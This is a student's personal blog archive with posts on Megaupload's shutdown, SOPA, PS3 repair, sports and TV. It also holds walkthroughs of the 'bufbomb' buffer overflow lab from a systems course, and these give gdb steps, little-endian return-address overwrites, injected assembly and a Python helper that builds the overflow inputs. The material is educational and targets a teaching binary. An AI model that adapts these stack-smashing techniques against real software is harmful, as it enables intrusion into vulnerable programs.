So long, megaupload…

Megaupload has been shut down after four of its members were arrested by the U.S. It’s a pretty interesting move on the part of the federal government to make these arrests the day after the anti-SOPA blackout, but so far it has caused Anonymous to go crazy and DDoS sites like the MPAA’s and whitehouse.gov.

I, for one, will miss Megaupload. Finding out that the CEO was a cool hacker dude who threw million-dollar parties in France has increased the amount of respect I have for the website.

In the end, I hope the government doesn’t win the copyright infringement debate/fight/war.

Posted in Internet

SOPA

I know you have all been downloading my Dick Cheney Cage Match. It’s not copyrighted or anything to do with SOPA, but I’m sure something weird would happen to more prominent blogs. It’s really bad. Do something about it.

Posted in Uncategorized

Updates

I updated my About I page slightly with the specs of my current computer. The machine that was previously there is being lent to one of my current roommates for SWTOR.

I don’t really feel very motivated anymore. This can be seen in the state of this blog and the frequency of my posting. I spend most of my time sleeping and staring at things.

Posted in Me, Purpose

PS3 Slim YLOD

I have a PS3 slim now, but it has YLOD (Yellow Light of Death) and I doubt I will be able to fix it. The RAM looks a little cooked (perhaps the previous owner used a heat gun on it, or it melted on its own). Anybody have any ideas on how to get it working? I have reflowed it before (with no success) and this is killing my 100% YLOD recovery rate on PlayStations. I may take another crack at it tonight, as I would much rather play my free copy of Infamous (I got it from the PlayStation Store when they got hacked last spring) on a slim PS3 with backlit buttons on the console instead of on my Phat PS3 that is upstairs being used to play digital content from my UPnP server.

Posted in Games

Word.

The NBA is horrible for vetoing the Chris Paul trade.

Finals are next week. Can’t wait ’til winter break.

Word.

Posted in college, Srsly

Done blogging about homework

I am not going to blog about homework anymore this year. It is now finals week and I am about to take my second final exam of the year. It will be interesting to see how viewership spikes around the end of each quarter as different schools have to solve the buffer overflow lab, but I don’t really want to write about it anymore. For those of you searching for the answer to bufbomb phase 3, there is a hint in a comment on the phase 2 post which pretty much tells you the secret, but I am not going to post a guide on how to solve it.

Now that school is almost done and winter break is approaching, I am going to focus on learning JavaScript and jQuery.

Posted in Uncategorized | 1 Comment

Bufbomb Phase 2

I finished the buffer overflow lab this evening and finally got around to writing up how to solve it.

Phase 3 is probably the most challenging phase and requires some knowledge to solve. Here are instructions to get you started, courtesy of Waseem, a commenter on the previous post:

…in phase 2, before that you need to put your cookie’s information in global_value’s memory location, so the steps are:

set global_value to the cookie and return to .

First write the assembly code for the 2 things mentioned above.

movl $0x349aab36, 0x804a02c <- This is the place where global_value is stored, so you need to find the memory address of your global_value using the gdb command printf "%x", &global_value.

pushl $0x80489ec <- This is the return address for , this would be the starting address of your bang function.
ret /// return

Then, using gcc -c and objdump -d, we can get the exploit code.

After calculating how many bytes they need, we can get the return address for the exploit code.

I hope this will help you in solving your phase 2.

These instructions were extremely helpful. Here are a few tips for how to solve this step.

I used the “info vars” command in gdb to get the address of global_value. For the return address you need to find the address of the first byte of the input string. This can be found by dumping 20 words off of %esp and then narrowing down the location in memory. I used x/20wx $ebp in gdb inside the getbuf function and spotted the memory address I was looking for.

Posted in college, Computers | 24 Comments

Bufbomb phase 0 and 1

EDIT: This post has become extremely popular and I would like to take a minute to discuss why it is here. I put this post here to help students solve and understand the extremely difficult bufbomb lab. It is not here to give students the answers; it is here to explain, using assembly and GDB, how to work out the solutions and why they work, for students who might be struggling.

I have been working on Bufbomb phases 0 and 1 recently and decided to share a basic idea of how to do them for anybody who is searching the internet for the answers.

Phase 0

This phase is really easy and you should probably be able to get it on your own, but it took me a while to get. Start gdb and set a breakpoint on getbuf, then run until it hits the breakpoint. At this point you need the values of %ebp and %esp; just type ‘info registers’ to get them. Subtract %esp from %ebp using a hex calculator. This gives us the distance to the end of getbuf’s stack frame. You should know that the last 4 bytes of your input should be the address of the smoke function. Quit gdb by typing q and run objdump -d bufbomb. Find the smoke function in the output and write down its address. Now make your input file using nano, emacs or vi and name it something like candle.txt. You need to do a bit of calculation here: subtract 4 from the distance you calculated between %esp and %ebp, then type in numbers (one byte each) until you reach the new distance. For example, if my distance between %esp and %ebp was 28 I would type:

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

Now you need to reverse the bytes of the smoke function’s address because the machine is little endian. For example, if the address of my smoke function was 12345678, I would put 78 56 34 12 into my input file. The input file would look like this:

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 78 56 34 12

Save your input file and use sendstring to encode it to binary with this command:

./sendstring < candle.txt > candle.bin

Now run the bufbomb:

./bufbomb -t *team name* < candle.bin

Phase 1

This phase is slightly harder and requires slightly more skill to solve. The goal is to call the fizz function and pass it your cookie as an argument. The first part is pretty much the same as Phase 0. Use ‘objdump -d bufbomb’ to find the address of the fizz function. Put the address of fizz where the address of smoke went in the first phase, reversed in the same way. If your address for fizz was 01122334 it would be 34 23 12 01.

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 34 23 12 01

Now add 4 bytes of padding (I used the value 30) and then your cookie, reversed for a little-endian machine. If my cookie was 56789123 it would be 23 91 78 56. Using that logic, add the cookie to the end of your string.

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 34 23 12 01 30 30 30 30 23 91 78 56

From there, save and use sendstring to encode to a binary file again, and run it like you did in the first step. I am pretty sure that this is how I completed the first two phases, but if anybody reading this needs more help, hit up the comments and I will try to assist.
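As an added example (not from the original post), here is a small Python helper that automates the byte layout the two phases describe: filler up to the distance minus 4, the target address written least-significant byte first, and for phase 1 four padding bytes followed by the cookie. It also decodes a finished candle.txt-style input so a student can check which word lands in the return-address slot before sending it; the 28-byte distance, the 12345678 and 01122334 addresses and the 56789123 cookie are the post’s own example values, and the function names are mine.

```python
import struct

WORD = 4  # the lab runs on 32-bit IA32, so every address and the cookie is 4 bytes


def le_bytes(value):
    """Encode a 32-bit value least-significant byte first, as the post reverses by hand."""
    return struct.pack("<I", value)


def build_input(distance, target_addr, arg=None, pad_byte=0x30):
    """Build the raw bytes of a phase 0 or phase 1 input.

    distance    -- %ebp minus %esp as read in gdb (28 in the post's example)
    target_addr -- address of smoke (phase 0) or fizz (phase 1) from objdump
    arg         -- the cookie for phase 1; None for phase 0
    """
    n_fill = distance - WORD
    # Filler bytes in the post's counting style: "01 02 03 ... 24" read as hex pairs.
    fill = bytes(int("%02d" % (i % 100), 16) for i in range(1, n_fill + 1))
    data = fill + le_bytes(target_addr)
    if arg is not None:
        # Phase 1: four padding bytes sit where fizz expects its return address and
        # the cookie lands one word above, where fizz reads its first argument.
        data += bytes([pad_byte]) * WORD + le_bytes(arg)
    return data


def to_sendstring(data):
    """Format raw bytes as the space-separated hex pairs that sendstring consumes."""
    return " ".join("%02x" % b for b in data)


def from_sendstring(text):
    """Parse a candle.txt-style text back into bytes (whitespace is ignored)."""
    return bytes.fromhex(text)


def explain(data, distance):
    """Decode a candidate input so its layout can be checked before sending it.

    Returns the total length, the word that overwrites the saved return address
    and, when the input is long enough, the padding word and the argument word.
    """
    ra_off = distance - WORD
    info = {"length": len(data),
            "return_addr": struct.unpack_from("<I", data, ra_off)[0]}
    if len(data) >= ra_off + 3 * WORD:
        info["pad"] = data[ra_off + WORD:ra_off + 2 * WORD]
        info["arg"] = struct.unpack_from("<I", data, ra_off + 2 * WORD)[0]
    return info
```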

Posted in college | 22 Comments

STRAIGHT OUTTA COMPTON

HOLY CRAP the new hockey arena, Compton Ice, is AMAZING. I am going to every game ever.

Posted in Uncategorized | 5 Comments

Seinfeld

I watched some Seinfeld tonight. It’s been a while. It’s an awesome show though. I just had to break down my tolerance of it again.

Fall break has commenced. I was hoping to be around this Friday to bro tier with Warren but it turns out I will have to do the opposite. The opposite of that is probably going back to school with my grandparents to show them the college campus early, and then going to the first hockey game in the new arena after they leave. But that’s getting into some pretty heavy opposite theory.

Should I stay up more and keep watching Seinfeld? Yes.

Posted in college, QGAGE, Srsly, Uncategorized | 1 Comment